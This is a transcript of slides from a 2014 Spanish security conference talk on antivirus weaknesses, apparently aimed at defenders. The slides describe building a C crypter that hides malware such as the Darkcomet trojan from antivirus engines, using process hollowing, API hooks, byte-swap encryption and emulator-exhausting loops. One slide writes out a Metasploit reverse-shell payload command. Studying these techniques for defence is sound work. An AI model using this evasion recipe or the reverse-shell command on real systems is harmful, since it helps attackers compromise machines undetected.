Desmitificando el Antivirus

Transcripción

1 La defensa del patrimonio tecnológico frente a los ciberataques 10 y 11 de diciembre de 2014 Desmitificando el Antivirus 2014 Centro Criptológico Nacional C/Argentona 20, MADRID

2 VIII JORNADAS STIC CCN-CERT Abraham Pasamar Navarro INCIDE 2

3 VIII JORNADAS STIC CCN-CERT Índice 1.- Efectividad de los Antivirus 2.- Evasión de Antivirus 3.- Crypters 4.- C Crypter 5.- Demo 3

4 VIII JORNADAS STIC CCN-CERT Antivirus 4

5 VIII JORNADAS STIC CCN-CERT Antivirus Nos protegen? Sí Hasta qué punto? Todo lo que pueden respecto de las infecciones comunes y lo que pueden prever 5

6 VIII JORNADAS STIC CCN-CERT Ataque dirigido (APT) Cybercriminales Nos protegen? No mucho Las técnicas de Detección de los AVs actualmente son insuficientes Las defensas convencionales son insuficientes 6

7 VIII JORNADAS STIC CCN-CERT Press Brian Dye, CEO de Symantec mayo 2014 Paradigma ha cambiado > protección AV host/perimetro es insuficiente 7

8 VIII JORNADAS STIC CCN-CERT AV s: Cómo funcionan? Escanean binarios en el DISCO Escanean en MEMORIA? algunos y poco :( Buscan AV BBDD Buscan TÉCNICAS MALICIOSAS (heurística) EMULADOR (ejecución parcial) Tiempo Real 8

9 VIII JORNADAS STIC CCN-CERT Por qué evadir AV s? BAD GUYS: MALWARE = $$$$$$$ Botnets, Ransomware APT GOOD GUYS: Auditoría, Pentesting 9

10 Cómo evadir AV s? VIII JORNADAS STIC CCN-CERT Encoders MALWARE suele ser una pieza compleja. Crypter es mucho más simple. Packers Permite proteger malware detectado. REUTILIZACIÓN Crypters msfpayload windows/shell/revers e_tcp LHOST= LPORT= 4444 R msfencode -c 5 -e x86/ shikata_ga_nai -x notepad.exe > notepad2.exe TIP: Método Público = MAL Método Privado = BIEN 10

11 Información sobre Crypters? Papers VIII JORNADAS STIC CCN-CERT Abusing File Processing in Malware Detectors for Fun and Profit (2012) Suman Jana and Vitaly Shmatikov The University of Texas at Austin Bypassing Anti-Virus Scanners (2012) InterNOT Security Team Hyperion: Implementation of a PE-Crypter (2012) Christian Ammann One packer to rule them all: Empirical identification, comparison and circumvention of current Antivirus detection techniques (BruCON 2014) Arne Swinnen,Alaeddine Mesbahi 11

12 VIII JORNADAS STIC CCN-CERT Foros Underground Manuales Video-Tutoriales Binarios Código Herramientas Multi AV-Scanners Enlaces:

13 VIII JORNADAS STIC CCN-CERT Qué es un Crypter? Software creado para ocultar código malicioso y hacerlo indetectable a los antivirus (FUD) CRYPTER (Builder) STUB MALWARE DETECTADO CRYPTER + STUB XOR, RC4... exe dll recurso STUB MALWARE CIFRADO 13

14 VIII JORNADAS STIC CCN-CERT Builder/Stub 14

15 PROCESO 2 PROCESO 1 VIII JORNADAS STIC CCN-CERT RunPE o Dynamic Forking CreateProcess (CREATE_SUSPENDED) EP I EP 2 ReadFile GetThreadContext WriteProcessMemory ResumeThread SetThreadContext BaseAddress PEB EBX EAX 15

16 Let s code a C Crypter VIII JORNADAS STIC CCN-CERT Builder MALWARE STUB C O N T E N E D O R MALWARE CIFRADO 16

17 Let s code a C Crypter VIII JORNADAS STIC CCN-CERT Builder RUTINA DE CIFRADO 17

18 Let s code a C Crypter VIII JORNADAS STIC CCN-CERT Builder STUB+FIRMA+MALWARE CIFRADO 18

19 VIII JORNADAS STIC CCN-CERT Let s code a C Crypter Stub Localizar la FIRMA SEPARADORA Descifrado (decryptbuffer=xor[buffer]) 19

20 VIII JORNADAS STIC CCN-CERT Let s code a C Crypter Stub Arrancar el proceso en memoria (Dynamic Forking) Estructuras CreateProcess WriteProcessMemory cabecera (CREATE_SUSPEND) ResumeThread ejecutable 20

21 VIII JORNADAS STIC CCN-CERT Let s code a C Crypter TROJAN SERVER (Darkcomet). SIN CRYPTER Multi AV SCAN TROJAN SERVER CRYPTED (stub+[crypted Darkcomet]) 21

22 Improving the Crypter VIII JORNADAS STIC CCN-CERT :( 13 Signatures Qué podemos hacer? API HOOKS :) GetProcAddress 22

23 Let s Scan the Crypter V1 - Original Crypter Multi AV SCAN VIII JORNADAS STIC CCN-CERT V2 - API Hooks 23

24 Improving the Crypter VIII JORNADAS STIC CCN-CERT Añadiendo soporte para parámetros main > WinMain (ncmdline) 24

25 Improving the Crypter Cambiando la rutina de cifrado XOR > byte SWAP VIII JORNADAS STIC CCN-CERT 25

26 Let s scan the Crypter V2 - API Hooks Multi AV SCAN VIII JORNADAS STIC CCN-CERT V3 - Parameters & byte Swap Ooohhh!!! 26

27 Improving the Crypter VIII JORNADAS STIC CCN-CERT FIRMAS indican HEURISTICA Matemos las firmas heurísticas!!! Exhausting routine Emulador > Time Out big loop ANTIVIRUS EMULATOR REAL TIME DETECTION No es posible procesarlo en tiempo real junk code 27

28 Let s Scan the Crypter V3 - Parameters & byte Swap Multi AV SCAN VIII JORNADAS STIC CCN-CERT V4 - Exhausting Routine OH YEAH!!! 28

29 Improving the Crypter FIRMAS Estáticas VIII JORNADAS STIC CCN-CERT AVAST Método de cifrado Variante: SWAP +/- 1 29

30 Improving the Crypter FIRMAS Estáticas VIII JORNADAS STIC CCN-CERT AVIRA Firmas Cabecera (CRC/clusterización) - FLAGS Sección CAMBIAMOS FLAGs VALOR NO ESPERADO 30

31 Let s scan the Crypter V4 - Exhausting Routine Multi AV SCAN VIII JORNADAS STIC CCN-CERT V6 - Cifrado+ & patch Flags Awesome!!! 31

32 VIII JORNADAS STIC CCN-CERT DEMO Crypter en C (FUD) Probarlo en un ataque Ingeniería social (1 click) Word + Macro (downloader) Sandworm (0 clicks) Ejecución FUD-Trojan en TR 32

33 Conclusiones Bypass AVs es POSIBLE -> Compromiso INFORMACIÓN VIII JORNADAS STIC CCN-CERT Necesario prestar atención al COMPORTAMIENTO Algunos elementos a considerar: Perímetro (callbacks C&C) SANDBOX Contexto 33

34 VIII JORNADAS STIC CCN-CERT IMÁGENES Banco Imáges Propio Flickr, user: eviltomthai Chiswick Chap - Own work 34

35 VIII JORNADAS STIC CCN-CERT GRACIAS POR SU INCIDE Avda. Diagonal, 640 6ª Planta Barcelona 1NC1D3 Companies > INCIDE - Investigación Digital Tel./Fax /

36 s Websites Síguenos en Linked in